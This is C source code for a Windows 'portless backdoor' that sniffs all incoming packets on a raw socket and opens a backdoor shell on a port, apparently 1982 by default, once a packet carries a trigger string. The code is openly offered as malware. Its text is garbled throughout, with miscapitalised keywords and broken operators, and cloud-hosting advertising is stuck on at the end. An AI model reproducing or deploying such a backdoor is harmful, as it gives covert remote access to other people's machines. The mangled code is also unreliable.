//************************************** ********************************
// Version: V1.0
// Coder: wineggdrop
// Date release: NULL
// Purpose: to demonstrate some portless backdoor Technique
// Test Platform: Win 2 K Pro and Server SP4
// Compiled on: KP 3.0, may compile on VC ++ 6.0 (not test yet)
//************************************** ********************************
# Include <windows. h>
# Include <stdio. h>
# Include <winsock2.h>
// Some structures to define
# Define ip_hdrincl 2
# Define sio_rcvall _ wsaiow (ioc_vendor, 1)
# Define max_pack_len 65535
# Define max_addr_len 16
# Define max_hostname_lan 255
Typedef struct _ iphdr
{
Unsigned char h_lenver;
Unsigned char TOS;
Unsigned short total_len;
Unsigned short ident;
Unsigned short frag_and_flags;
Unsigned char TTL;
Unsigned char proto;
Unsigned short checksum;
Unsigned int sourceip;
Unsigned int destip;
} Ip_header;
Typedef struct _ tcphdr
{
Ushort th_sport;
Ushort th_dport;
Unsigned int th_seq;
Unsigned int th_ack;
Unsigned char th_lenres;
Unsigned char th_flag;
Ushort th_win;
Ushort th_sum;
Ushort th_urp;
} Tcp_header;
// End of Structure
// Global variable
Char sourceipaddress [max_addr_len]; // hold the Source IP (this can be used to do reverse connection)
Int backdoorport = 0; // The port back door will bind
// Function prototype Declaration
// Configure //------------------------------------------------------------------------------------------------------
Bool initsocket ();
Bool dosniffing ();
Bool decodeippack (const char * buffer, const int buffersize );
Bool decodetcppack (const char * tcpbuffer, const int buffersize );
Bool iswin2korabve ();
DWORD winapi startbackdoor (lpvoid para );
Bool getabackdoorshell (const socket listensocket );
Bool sendsocket (const socket clientsocket, const char * message );
Unsigned int receivemessagefromsocket (const socket clientsocket, char * buffer, const int buffersize );
// Configure //------------------------------------------------------------------------------------------------------
// End of fucntion prototype Declaration
// Main Function
Int main (INT argc, char * argv [])
{
If (! Iswin2korabve () // This system running this program is not win 2 K or above
{
Printf ("the program must run under WIN 2 K or above OS/N"); // display this message
Return-1; // quit the program
}
If (argc = 2) // we get argument
Backdoorport = atoi (argv [1]); // argument one is the back door's Port
Else // No argument
Backdoorport = 1982; // back door's port will be defined on 1982
If (! Initsocket () // fail to initize socket
{
Printf ("fail to start up Winsock/N"); // Display error message
Return-1; // quit the program
}
Dosniffing (); // do sniffing
Return 0; // quit the program
} // End of Main Function
//-------------------------------------------------------------------------
// Purpose: to initize socket
// Return type: Boolean
// Parameters: NULL
// This is too simple, I won't comment it
//-------------------------------------------------------------------------
Bool initsocket ()
{
Wsadata data;
Word ver;
Ver = makeword (2, 2 );
If (wsastartup (ver, & Data )! = 0)
{
Return false;
}
Return true;
} // End of initsocket Function
//-------------------------------------------------------------------------
// Purpose: to do none-driver sniffing
// Return type: Boolean
// Parameters: NULL
//-------------------------------------------------------------------------
Bool dosniffing ()
{
Int length = 0; // variable to hold the Receive Buffer Length
Char recvbuf [max_pack_len] = {0}; // Receive Buffer
Socket socketraw = invalid_socket; // raw socket
Socketraw = socket (af_inet, sock_raw, ipproto_ip); // create a raw socket
If (socketraw = invalid_socket) // fail to create a raw socket
{
Printf ("fail to create a raw socket/N"); // Display error message
Return false; // return false
}
Char far name [max_hostname_lan];
If (gethostname (name, max_hostname_lan) = socket_error) // fail to get the host name
{
Printf ("fail to get host name/N"); // Display error message
Closesocket (socketraw); // close the raw socket created
Return false; // return false
}
// The below is the NIC stuff
Struct hostent far * phostent;
Phostent = (struct hostent *) malloc (sizeof (struct hostent); // allocate hostent Buffer
Phostent = gethostbyname (name );
Sockaddr_in SA;
SA. sin_family = af_inet; // That's Internet related
SA. sin_port = htons (0); // any port avariable on the OS
If (phostent-> h_addr_list [0]! = 0) // We only check the first Nic
{
Memcpy (& SA. sin_addr.s_un.s_addr, phostent-> h_addr_list [0], phostent-> h_length); // we use the first Nic as the sniffing subject
}
Else // well, the first Nic is not valid
{
Printf ("Get host by name fails/N"); // Display error message
Free (phostent); // free the hostent Buffer
Closesocket (socketraw );
Return false; // return false;
}
Free (phostent); // free the hostent Buffer
If (BIND (socketraw, (psockaddr) & SA, sizeof (SA) = socket_error) // bind the raw socket on the first Nic, but fails
{
Printf ("fail to bind/N"); // Display error message
Closesocket (socketraw); // close the raw socket
Return false; // return false
}
// Forget about the below a few lines, they are just a static routine to do the none_driver sniffing (some sort of must-have codes)
DWORD dwbufferlen [10];
DWORD dwbufferinlen = 1;
DWORD dwbytesreturned = 0;
If (wsaioctl (socketraw, sio_rcvall, & dwbufferinlen, sizeof (dwbufferinlen), & dwbufferlen, sizeof (dwbufferlen), & dwbytesreturned, null, null) = fig _ error)
{
Closesocket (socketraw );
Return false;
}
While (true) // sniffing starts here with forever Loop
{
Memset (recvbuf, 0, sizeof (recvbuf); // reset the Receive Buffer
Length = Recv (socketraw, recvbuf, sizeof (recvbuf), 0); // try to receive data
If (length = socket_error) // get error as loading ing data
{
Printf ("fail to receive data/N"); // Display error message
Break; // leave the loop
}
If (decodeippack (recvbuf, length) // decode the buffer written ed, and the active code is found
{
Printf ("bingo, the backdoor is activated on port % d/N", backdoorport); // we are going to activate the backdoor
DWORD dwthreadid;
Handle backdoorthread = createthread (null, 0, & startbackdoor, null, 0, & dwthreadid); // create the back door thread
Waitforsingleobject (backdoorthread, infinite); // wait until the back door ends
}
}
Closesocket (socketraw); // close the raw socket
Return true; // return
} // End of dosniffing Function
//-------------------------------------------------------------------------
// Purpose: to decode the IP packer
// Return type: Boolean
// Parameters: 1. Const char * buffer --> the specified ed Buffer
// 2. Const int buffersize --> the occupied ed buffer size
//-------------------------------------------------------------------------
Bool decodeippack (const char * buffer, const int buffersize)
{
Ip_header * pipheader; // IP Header
Sockaddr_in sasource, sadest;
Pipheader = (ip_header *) buffer; // transfer the buffer into IP header form
Int protocol = pipheader-> proto; // GET THE PROTOCOL
If (protocol! = Ipproto_tcp) // not TCP protocol
{
Return false; // return false since we only interest in TCP protocol
}
Sasource. sin_addr.s_addr = pipheader-> sourceip;
Strncpy (sourceipaddress, inet_ntoa (sasource. sin_addr), max_addr_len); // get the Source IP (important for doing reverse connection)
Int iplength = sizeof (unsigned long) * (pipheader-> h_lenver & 0xf); // get the IP length
Return decodetcppack (buffer + iplength, buffersize); // decode TCP packer
} // End of decodeippack Function
//-------------------------------------------------------------------------
// Purpose: to decode the TCP packer
// Return type: Boolean
// Parameters: 1. Const char * tcpbuffer --> the TCP Buffer
// 2. Const int buffersize --> the TCP buffer size
//-------------------------------------------------------------------------
Bool decodetcppack (const char * tcpbuffer, const int buffersize)
{
Tcp_header * ptcpheader; // TCP Header
Int isourceport, idestport; // source port and destport
Ptcpheader = (tcp_header *) tcpbuffer; // transfer the buffer into TCP Header form
Int tcpheaderlen = ptcpheader-> th_lenres> 4; // get the TCP leader Length
Tcpheaderlen * = sizeof (unsigned long );
Char * tcpdata = tcpbuffer + tcpheaderlen; // get the TCP Data
Isourceport = ntohs (ptcpheader-> th_sport); // get the source port
Idestport = ntohs (ptcpheader-> th_dport); // get the destination port
If (strstr (tcpdata, "wineggdrop ")! = NULL) // If the TCP data contains a word "wineggdrop" (the active code), then bingo
{
Printf ("% s: % d --> Local: % d/R/N", sourceipaddress, isourceport, idestport); // display a message
Return true; // return true (the back door will be activated soon)
}
Return false; // we didn't receive an active code, return false
} // End of decodetcppack Function
[Code]
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
